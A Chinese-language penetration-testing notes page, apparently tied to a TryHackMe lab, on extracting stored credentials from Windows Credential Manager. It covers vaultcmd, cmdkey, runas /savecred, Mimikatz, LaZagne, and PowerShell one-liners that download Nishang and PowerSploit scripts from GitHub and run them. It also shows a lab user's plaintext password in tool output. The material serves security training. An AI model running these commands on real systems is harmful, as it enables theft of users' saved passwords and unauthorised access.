权限:管理员 | 系统 | 用户

描述:凭证管理器是一项 Windows 功能,用于存储网站/应用程序/网络的登录凭证,存在四种凭证类别:

  • WEB 凭证
  • Windows 凭证: Windows 身份验证信息: NTLM Kerberos
  • 通用凭证包含基本的身份验证详细信息
  • 基于证书的凭据

访问凭据管理器

控制面板 --> 用户账户 --> 凭据管理器

我们可以使用相关命令来获取 Windows 中存储的凭据:

  1. C:\Users\Administrator>vaultcmd /list
  2. Currently loaded vaults:
  3.         Vault: Web Credentials
  4.         Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  5.         Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  7.         Vault: Windows Credentials
  8.         Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
  9.         Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault

默认情况下,Windows 存在两个保管库,一个 WEB ,另一个用于 Windows 计算凭证

我们可以使用 VaultCmd /listproperties:"Web Credentials"来查看WEB 凭证保管库中是否有存储的凭证

  1. C:\Users\Administrator>VaultCmd /listproperties:"Web Credentials"
  2. Vault Properties: Web Credentials
  3. Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  4. Number of credentials: 1
  5. Current protection method: DPAPI

输出保存的凭据:

  1. C:\Users\Administrator>VaultCmd /listcreds:"Web Credentials"
  2. Credentials in vault: Web Credentials
  4. Credential schema: Windows Web Password Credential
  5. Resource: internal-app.thm.red
  6. Identity: THMUser Saved By: MSEdge
  7. Hidden: No
  8. Roaming: Yes

Get-WebCredentials.ps1 (NiShang)

  1. C:\Users\Administrator>powershell -ex bypass
  2. Windows PowerShell
  3. Copyright (C) Microsoft Corporation. All rights reserved.
  5. PS C:\Users\Administrator> Import-Module C:\Tools\Get-WebCredentials.ps1
  6. PS C:\Users\Administrator> Get-WebCredentials
  8. UserName  Resource             Password     Properties
  9. --------  --------             --------     ----------
  10. THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}
  1. powershell iex (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-WebCredentials.ps1"); Get-WebCredentials

Windows Credential Manager - 图1

RunAS

RunAs 是一个内置的命令行工具,允许在不同用户的权限下运行 Windows 应用程序或工具。

运行方式工具具有可在 Windows 系统中使用的各种命令参数。/savecred 该参数允许您在 Windows 凭据管理器(在“Windows 凭据”部分下)中保存用户的凭据

列出所有的保存的凭证

  1. C:\Users\thm>cmdkey /list
  3. Currently stored credentials:
  5.     Target: Domain:interactive=thm\thm-local
  6.     Type: Domain Password
  7.     User: thm\thm-local
  1. C:\Users\thm>runas /savecred /user:THM.red\thm-local cmd.exe
  2. Attempting to start cmd.exe as user "THM.red\thm-local" ...

Mimikatz

  1. C:\Users\Administrator>c:\Tools\Mimikatz\mimikatz.exe
  3.   .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
  4.  .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
  5.  ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  6.  ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
  7.  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  8.   '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
  10. mimikatz # privilege::debug
  11. Privilege '20' OK
  13. mimikatz # sekurlsa::credman

LaZagne

  1. LaZagne.exe windows

Windows Credential Manager - 图2

Get-VaultCredential (PowerSploit)

  1. iex (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1"); Get-VaultCredential

Windows Credential Manager - 图3

参考

Windows Credential Manager - Pentest Everything

TryHackMe | Cyber Security Training